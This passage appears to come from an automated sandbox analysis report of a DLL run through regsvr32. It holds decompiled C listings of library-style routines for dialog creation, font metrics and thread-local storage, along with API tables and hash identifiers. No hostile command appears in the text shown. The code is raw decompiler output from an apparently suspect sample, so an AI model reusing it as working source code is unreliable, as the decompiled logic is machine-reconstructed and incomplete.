                                                                                                                                                                            				DLGTEMPLATE* _t130;
                                                                                                                                                                            				struct HWND__* _t131;
                                                                                                                                                                            				void* _t132;
                                                                                                                                                                            
                                                                                                                                                                            				_t128 = __esi;
                                                                                                                                                                            				_t124 = __edx;
                                                                                                                                                                            				_t104 = __ecx;
                                                                                                                                                                            				_push(0x3c);
                                                                                                                                                                            				E10017BF4(E1002800E, __ebx, __edi, __esi);
                                                                                                                                                                            				_t103 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
                                                                                                                                                                            				_t136 =  *(_t132 + 0x10);
                                                                                                                                                                            				if( *(_t132 + 0x10) == 0) {
                                                                                                                                                                            					 *(_t132 + 0x10) =  *(E1000D5EC(__ecx, 0, __esi, _t136) + 0xc);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t129 =  *(E1000D5EC(_t103, 0, _t128, _t136) + 0x3c);
                                                                                                                                                                            				 *(_t132 - 0x28) = _t129;
                                                                                                                                                                            				 *(_t132 - 0x14) = 0;
                                                                                                                                                                            				 *(_t132 - 4) = 0;
                                                                                                                                                                            				E10012406(_t103, _t104, 0, _t129, _t136, 0x10);
                                                                                                                                                                            				E10012406(_t103, _t104, 0, _t129, _t136, 0x7c000);
                                                                                                                                                                            				if(_t129 == 0) {
                                                                                                                                                                            					_t130 =  *(_t132 + 8);
                                                                                                                                                                            					L7:
                                                                                                                                                                            					__eflags = _t130;
                                                                                                                                                                            					if(_t130 == 0) {
                                                                                                                                                                            						L4:
                                                                                                                                                                            						_t65 = 0;
                                                                                                                                                                            						L32:
                                                                                                                                                                            						return E10017C60(_t65);
                                                                                                                                                                            					}
                                                                                                                                                                            					E10009E23(_t132 - 0x1c, E10013479());
                                                                                                                                                                            					 *(_t132 - 4) = 1;
                                                                                                                                                                            					 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                                                                                            					__eflags = E10014A97(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
                                                                                                                                                                            					__eflags =  *0x1005aa84; // 0x0
                                                                                                                                                                            					_t72 = 0 | __eflags == 0x00000000;
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						L14:
                                                                                                                                                                            						__eflags = _t72;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							L17:
                                                                                                                                                                            							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
                                                                                                                                                                            							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
                                                                                                                                                                            							E100115DC(0, __eflags, _t103);
                                                                                                                                                                            							_t74 =  *(_t132 + 0xc);
                                                                                                                                                                            							__eflags = _t74;
                                                                                                                                                                            							if(_t74 != 0) {
                                                                                                                                                                            								_t75 =  *(_t74 + 0x20);
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t75 = 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1000C402, 0);
                                                                                                                                                                            							E10009CB7( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
                                                                                                                                                                            							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
                                                                                                                                                                            							_t110 =  *(_t132 - 0x28);
                                                                                                                                                                            							__eflags = _t110;
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
                                                                                                                                                                            								__eflags = _t131;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									 *((intOrPtr*)( *_t103 + 0x12c))(0);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t78 = E1000FC04(_t103, 0, __eflags);
                                                                                                                                                                            							__eflags = _t78;
                                                                                                                                                                            							if(_t78 == 0) {
                                                                                                                                                                            								 *((intOrPtr*)( *_t103 + 0x114))();
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t131;
                                                                                                                                                                            							if(_t131 != 0) {
                                                                                                                                                                            								__eflags =  *(_t103 + 0x3c) & 0x00000010;
                                                                                                                                                                            								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
                                                                                                                                                                            									DestroyWindow(_t131);
                                                                                                                                                                            									_t131 = 0;
                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *(_t132 - 0x14);
                                                                                                                                                                            							if( *(_t132 - 0x14) != 0) {
                                                                                                                                                                            								GlobalUnlock( *(_t132 - 0x14));
                                                                                                                                                                            								GlobalFree( *(_t132 - 0x14));
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t131;
                                                                                                                                                                            							_t59 = _t131 != 0;
                                                                                                                                                                            							__eflags = _t59;
                                                                                                                                                                            							_t65 = 0 | _t59;
                                                                                                                                                                            							goto L32;
                                                                                                                                                                            						}
                                                                                                                                                                            						L15:
                                                                                                                                                                            						E10014A60(_t103, _t132 - 0x38, 0, _t132, _t130);
                                                                                                                                                                            						 *(_t132 - 4) = 2;
                                                                                                                                                                            						E100149BE(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
                                                                                                                                                                            						 *(_t132 - 0x14) = E100146D7(_t132 - 0x38);
                                                                                                                                                                            						 *(_t132 - 4) = 1;
                                                                                                                                                                            						E100146C9(_t132 - 0x38);
                                                                                                                                                                            						__eflags =  *(_t132 - 0x14);
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							_t130 = GlobalLock( *(_t132 - 0x14));
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t72;
                                                                                                                                                                            					if(_t72 != 0) {
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = GetSystemMetrics(0x2a);
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t95 = E1000C95C(_t132 - 0x1c, "MS Shell Dlg");
                                                                                                                                                                            					__eflags = _t95;
                                                                                                                                                                            					_t72 = 0 | _t95 == 0x00000000;
                                                                                                                                                                            					__eflags = _t72;
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *((short*)(_t132 - 0x18)) - 8;
                                                                                                                                                                            					if( *((short*)(_t132 - 0x18)) == 8) {
                                                                                                                                                                            						 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L14;
                                                                                                                                                                            				}
                                                                                                                                                                            				_push(_t132 - 0x48);
                                                                                                                                                                            				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
                                                                                                                                                                            					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
                                                                                                                                                                            					goto L7;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L4;
                                                                                                                                                                            			}
















                                                                                                                                                                            0x1000c984
                                                                                                                                                                            0x1000c984
                                                                                                                                                                            0x1000c984
                                                                                                                                                                            0x1000c984
                                                                                                                                                                            0x1000c98b
                                                                                                                                                                            0x1000c990
                                                                                                                                                                            0x1000c992
                                                                                                                                                                            0x1000c997
                                                                                                                                                                            0x1000c99a
                                                                                                                                                                            0x1000c9a4
                                                                                                                                                                            0x1000c9a4
                                                                                                                                                                            0x1000c9ac
                                                                                                                                                                            0x1000c9b1
                                                                                                                                                                            0x1000c9b4
                                                                                                                                                                            0x1000c9b7
                                                                                                                                                                            0x1000c9ba
                                                                                                                                                                            0x1000c9c4
                                                                                                                                                                            0x1000c9cb
                                                                                                                                                                            0x1000c9f8
                                                                                                                                                                            0x1000c9fb
                                                                                                                                                                            0x1000c9fb
                                                                                                                                                                            0x1000c9fd
                                                                                                                                                                            0x1000c9df
                                                                                                                                                                            0x1000c9df
                                                                                                                                                                            0x1000cb6c
                                                                                                                                                                            0x1000cb71
                                                                                                                                                                            0x1000cb71
                                                                                                                                                                            0x1000ca08
                                                                                                                                                                            0x1000ca16
                                                                                                                                                                            0x1000ca1a
                                                                                                                                                                            0x1000ca27
                                                                                                                                                                            0x1000ca2c
                                                                                                                                                                            0x1000ca32
                                                                                                                                                                            0x1000ca34
                                                                                                                                                                            0x1000ca6a
                                                                                                                                                                            0x1000ca6a
                                                                                                                                                                            0x1000ca6c
                                                                                                                                                                            0x1000caad
                                                                                                                                                                            0x1000caad
                                                                                                                                                                            0x1000cab1
                                                                                                                                                                            0x1000cab6
                                                                                                                                                                            0x1000cabb
                                                                                                                                                                            0x1000cabe
                                                                                                                                                                            0x1000cac0
                                                                                                                                                                            0x1000cac6
                                                                                                                                                                            0x1000cac2
                                                                                                                                                                            0x1000cac2
                                                                                                                                                                            0x1000cac2
                                                                                                                                                                            0x1000cae0
                                                                                                                                                                            0x1000cae2
                                                                                                                                                                            0x1000cae7
                                                                                                                                                                            0x1000cb09
                                                                                                                                                                            0x1000cb0c
                                                                                                                                                                            0x1000cb0e
                                                                                                                                                                            0x1000cb16
                                                                                                                                                                            0x1000cb19
                                                                                                                                                                            0x1000cb1b
                                                                                                                                                                            0x1000cb22
                                                                                                                                                                            0x1000cb22
                                                                                                                                                                            0x1000cb1b
                                                                                                                                                                            0x1000cb28
                                                                                                                                                                            0x1000cb2d
                                                                                                                                                                            0x1000cb2f
                                                                                                                                                                            0x1000cb35
                                                                                                                                                                            0x1000cb35
                                                                                                                                                                            0x1000cb3b
                                                                                                                                                                            0x1000cb3d
                                                                                                                                                                            0x1000cb3f
                                                                                                                                                                            0x1000cb43
                                                                                                                                                                            0x1000cb46
                                                                                                                                                                            0x1000cb4c
                                                                                                                                                                            0x1000cb4c
                                                                                                                                                                            0x1000cb4c
                                                                                                                                                                            0x1000cb43
                                                                                                                                                                            0x1000cb4e
                                                                                                                                                                            0x1000cb51
                                                                                                                                                                            0x1000cb56
                                                                                                                                                                            0x1000cb5f
                                                                                                                                                                            0x1000cb5f
                                                                                                                                                                            0x1000cb67
                                                                                                                                                                            0x1000cb69
                                                                                                                                                                            0x1000cb69
                                                                                                                                                                            0x1000cb69
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000cb69
                                                                                                                                                                            0x1000ca6e
                                                                                                                                                                            0x1000ca72
                                                                                                                                                                            0x1000ca7d
                                                                                                                                                                            0x1000ca81
                                                                                                                                                                            0x1000ca91
                                                                                                                                                                            0x1000ca94
                                                                                                                                                                            0x1000ca98
                                                                                                                                                                            0x1000ca9d
                                                                                                                                                                            0x1000caa0
                                                                                                                                                                            0x1000caab
                                                                                                                                                                            0x1000caab
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000caa0
                                                                                                                                                                            0x1000ca36
                                                                                                                                                                            0x1000ca38
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ca42
                                                                                                                                                                            0x1000ca44
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ca4e
                                                                                                                                                                            0x1000ca55
                                                                                                                                                                            0x1000ca5a
                                                                                                                                                                            0x1000ca5c
                                                                                                                                                                            0x1000ca5e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ca60
                                                                                                                                                                            0x1000ca65
                                                                                                                                                                            0x1000ca67
                                                                                                                                                                            0x1000ca67
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ca65
                                                                                                                                                                            0x1000c9d2
                                                                                                                                                                            0x1000c9dd
                                                                                                                                                                            0x1000c9f4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c9f4
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1000C98B
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 1000CA3C
                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 1000CAA5
                                                                                                                                                                            • CreateDialogIndirectParamA.USER32(?,?,?,1000C402,00000000), ref: 1000CAD4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                                                                            • String ID: MS Shell Dlg
                                                                                                                                                                            • API String ID: 1736106359-76309092
                                                                                                                                                                            • Opcode ID: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
                                                                                                                                                                            • Instruction ID: aca18bfbc2af702d8352a65e986f2fe47acd8ccb78c3dcc49b793ffb13d9be50
                                                                                                                                                                            • Opcode Fuzzy Hash: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
                                                                                                                                                                            • Instruction Fuzzy Hash: AF51A031A0020D9FDB05DFA4C88ADEEBBB4EF45780F254559F442EB199DB349E81CB52
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E100149BE(intOrPtr __ecx, signed int _a4) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v40;
                                                                                                                                                                            				void _v68;
                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				signed int _t12;
                                                                                                                                                                            				void* _t14;
                                                                                                                                                                            				char* _t23;
                                                                                                                                                                            				void* _t29;
                                                                                                                                                                            				signed short _t30;
                                                                                                                                                                            				struct HDC__* _t31;
                                                                                                                                                                            				signed int _t32;
                                                                                                                                                                            
                                                                                                                                                                            				_t12 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_v8 = _t12 ^ _t32;
                                                                                                                                                                            				_t31 = GetStockObject;
                                                                                                                                                                            				_t30 = 0xa;
                                                                                                                                                                            				_v72 = __ecx;
                                                                                                                                                                            				_t23 = "System";
                                                                                                                                                                            				_t14 = GetStockObject(0x11);
                                                                                                                                                                            				if(_t14 != 0) {
                                                                                                                                                                            					L2:
                                                                                                                                                                            					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
                                                                                                                                                                            						_t23 =  &_v40;
                                                                                                                                                                            						_t31 = GetDC(0);
                                                                                                                                                                            						if(_v68 < 0) {
                                                                                                                                                                            							_v68 =  ~_v68;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
                                                                                                                                                                            						ReleaseDC(0, _t31);
                                                                                                                                                                            					}
                                                                                                                                                                            					L6:
                                                                                                                                                                            					_t16 = _a4;
                                                                                                                                                                            					if(_a4 == 0) {
                                                                                                                                                                            						_t16 = _t30 & 0x0000ffff;
                                                                                                                                                                            					}
                                                                                                                                                                            					return E100167D5(E1001486F(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t14 = GetStockObject(0xd);
                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L2;
                                                                                                                                                                            			}

















                                                                                                                                                                            0x100149c4
                                                                                                                                                                            0x100149cb
                                                                                                                                                                            0x100149d0
                                                                                                                                                                            0x100149d9
                                                                                                                                                                            0x100149dc
                                                                                                                                                                            0x100149df
                                                                                                                                                                            0x100149e4
                                                                                                                                                                            0x100149e8
                                                                                                                                                                            0x100149f2
                                                                                                                                                                            0x10014a01
                                                                                                                                                                            0x10014a05
                                                                                                                                                                            0x10014a12
                                                                                                                                                                            0x10014a14
                                                                                                                                                                            0x10014a16
                                                                                                                                                                            0x10014a16
                                                                                                                                                                            0x10014a31
                                                                                                                                                                            0x10014a34
                                                                                                                                                                            0x10014a34
                                                                                                                                                                            0x10014a3a
                                                                                                                                                                            0x10014a3a
                                                                                                                                                                            0x10014a40
                                                                                                                                                                            0x10014a42
                                                                                                                                                                            0x10014a42
                                                                                                                                                                            0x10014a5d
                                                                                                                                                                            0x10014a5d
                                                                                                                                                                            0x100149ec
                                                                                                                                                                            0x100149f0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 100149E4
                                                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 100149EC
                                                                                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 100149F9
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 10014A08
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10014A1C
                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10014A28
                                                                                                                                                                            • ReleaseDC.USER32 ref: 10014A34
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                                                            • String ID: System
                                                                                                                                                                            • API String ID: 46613423-3470857405
                                                                                                                                                                            • Opcode ID: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
                                                                                                                                                                            • Instruction ID: a63e4a091ca1b7be2859df30e5517b7a4abcdff67d16382c886f5131b7cbdf71
                                                                                                                                                                            • Opcode Fuzzy Hash: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
                                                                                                                                                                            • Instruction Fuzzy Hash: 39118F71A40268EBEB10DBA1CC85FAE7BB8FF04781F420015FA02AA190DE709D46CB65
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                            			E10013C4D(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				void* _t36;
                                                                                                                                                                            				void* _t39;
                                                                                                                                                                            				long _t41;
                                                                                                                                                                            				void* _t42;
                                                                                                                                                                            				long _t47;
                                                                                                                                                                            				void* _t53;
                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                            				long* _t62;
                                                                                                                                                                            				struct _CRITICAL_SECTION* _t64;
                                                                                                                                                                            				void* _t65;
                                                                                                                                                                            				void* _t66;
                                                                                                                                                                            
                                                                                                                                                                            				_push(0x10);
                                                                                                                                                                            				E10017BF4(E10028893, __ebx, __edi, __esi);
                                                                                                                                                                            				_t62 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
                                                                                                                                                                            				_t64 = __ecx + 0x1c;
                                                                                                                                                                            				 *(_t66 - 0x14) = _t64;
                                                                                                                                                                            				EnterCriticalSection(_t64);
                                                                                                                                                                            				_t36 =  *(_t66 + 8);
                                                                                                                                                                            				if(_t36 <= 0 || _t36 >= _t62[3]) {
                                                                                                                                                                            					_push(_t64);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t65 = TlsGetValue( *_t62);
                                                                                                                                                                            					if(_t65 == 0) {
                                                                                                                                                                            						 *(_t66 - 4) = 0;
                                                                                                                                                                            						_t39 = E10013965(0x10);
                                                                                                                                                                            						__eflags = _t39;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							_t65 = 0;
                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							 *_t39 = 0x1002b1d8;
                                                                                                                                                                            							_t65 = _t39;
                                                                                                                                                                            						}
                                                                                                                                                                            						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                                                                                                                                                                            						_t51 =  &(_t62[5]);
                                                                                                                                                                            						 *(_t65 + 8) = 0;
                                                                                                                                                                            						 *(_t65 + 0xc) = 0;
                                                                                                                                                                            						E10013A82( &(_t62[5]), _t65);
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t55 =  *(_t66 + 8);
                                                                                                                                                                            						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
                                                                                                                                                                            							L5:
                                                                                                                                                                            							_t75 =  *(_t65 + 0xc);
                                                                                                                                                                            							if( *(_t65 + 0xc) != 0) {
                                                                                                                                                                            								_t41 = E100134F9(_t51, __eflags, _t62[3], 4);
                                                                                                                                                                            								_t53 = 2;
                                                                                                                                                                            								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t47 = E100134F9(_t51, _t75, _t62[3], 4);
                                                                                                                                                                            								_pop(_t53);
                                                                                                                                                                            								_t42 = LocalAlloc(0, _t47);
                                                                                                                                                                            							}
                                                                                                                                                                            							_t76 = _t42;
                                                                                                                                                                            							if(_t42 == 0) {
                                                                                                                                                                            								LeaveCriticalSection( *(_t66 - 0x14));
                                                                                                                                                                            								_t42 = E1000A0A7(0, _t53, _t62, _t65, _t76);
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t65 + 0xc) = _t42;
                                                                                                                                                                            							E100174D0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
                                                                                                                                                                            							 *(_t65 + 8) = _t62[3];
                                                                                                                                                                            							TlsSetValue( *_t62, _t65);
                                                                                                                                                                            							_t55 =  *(_t66 + 8);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_t36 =  *(_t65 + 0xc);
                                                                                                                                                                            					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
                                                                                                                                                                            						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
                                                                                                                                                                            					}
                                                                                                                                                                            					_push( *(_t66 - 0x14));
                                                                                                                                                                            				}
                                                                                                                                                                            				LeaveCriticalSection();
                                                                                                                                                                            				return E10017C60(_t36);
                                                                                                                                                                            			}














                                                                                                                                                                            0x10013c4d
                                                                                                                                                                            0x10013c54
                                                                                                                                                                            0x10013c59
                                                                                                                                                                            0x10013c5b
                                                                                                                                                                            0x10013c5e
                                                                                                                                                                            0x10013c62
                                                                                                                                                                            0x10013c65
                                                                                                                                                                            0x10013c6b
                                                                                                                                                                            0x10013c72
                                                                                                                                                                            0x10013d73
                                                                                                                                                                            0x10013c81
                                                                                                                                                                            0x10013c89
                                                                                                                                                                            0x10013c8d
                                                                                                                                                                            0x10013cc1
                                                                                                                                                                            0x10013cc4
                                                                                                                                                                            0x10013cc9
                                                                                                                                                                            0x10013ccb
                                                                                                                                                                            0x10013cd7
                                                                                                                                                                            0x10013cd7
                                                                                                                                                                            0x10013ccd
                                                                                                                                                                            0x10013ccd
                                                                                                                                                                            0x10013cd3
                                                                                                                                                                            0x10013cd3
                                                                                                                                                                            0x10013cd9
                                                                                                                                                                            0x10013cde
                                                                                                                                                                            0x10013ce1
                                                                                                                                                                            0x10013ce4
                                                                                                                                                                            0x10013ce7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013c8f
                                                                                                                                                                            0x10013c8f
                                                                                                                                                                            0x10013c95
                                                                                                                                                                            0x10013ca4
                                                                                                                                                                            0x10013ca4
                                                                                                                                                                            0x10013ca7
                                                                                                                                                                            0x10013d0b
                                                                                                                                                                            0x10013d11
                                                                                                                                                                            0x10013d16
                                                                                                                                                                            0x10013ca9
                                                                                                                                                                            0x10013cae
                                                                                                                                                                            0x10013cb4
                                                                                                                                                                            0x10013cb7
                                                                                                                                                                            0x10013cb7
                                                                                                                                                                            0x10013d1c
                                                                                                                                                                            0x10013d1e
                                                                                                                                                                            0x10013d23
                                                                                                                                                                            0x10013d29
                                                                                                                                                                            0x10013d29
                                                                                                                                                                            0x10013d31
                                                                                                                                                                            0x10013d42
                                                                                                                                                                            0x10013d4e
                                                                                                                                                                            0x10013d53
                                                                                                                                                                            0x10013d59
                                                                                                                                                                            0x10013d59
                                                                                                                                                                            0x10013c95
                                                                                                                                                                            0x10013d5c
                                                                                                                                                                            0x10013d61
                                                                                                                                                                            0x10013d6b
                                                                                                                                                                            0x10013d6b
                                                                                                                                                                            0x10013d6e
                                                                                                                                                                            0x10013d6e
                                                                                                                                                                            0x10013d74
                                                                                                                                                                            0x10013d7f

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 10013C54
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,00000010,10013E18,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013C65
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013C83
                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013CB7
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
                                                                                                                                                                            • _memset.LIBCMT ref: 10013D42
                                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1891723912-0
                                                                                                                                                                            • Opcode ID: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
                                                                                                                                                                            • Instruction ID: 361604de1dd3242a2b5db774f8c39e7d6c7c8771dcfb3c7945be7f3a81b5ec95
                                                                                                                                                                            • Opcode Fuzzy Hash: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
                                                                                                                                                                            • Instruction Fuzzy Hash: 3F317C74500616AFDB20DF65E886C5EBBB5FF04350B21C529F95AAB661CB30ED90CB80
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                            			E1000A6E3(void* __ecx, char* _a4) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				void* _t15;
                                                                                                                                                                            				void* _t20;
                                                                                                                                                                            				void* _t35;
                                                                                                                                                                            
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				_t35 = __ecx;
                                                                                                                                                                            				_t15 =  *(__ecx + 0x74);
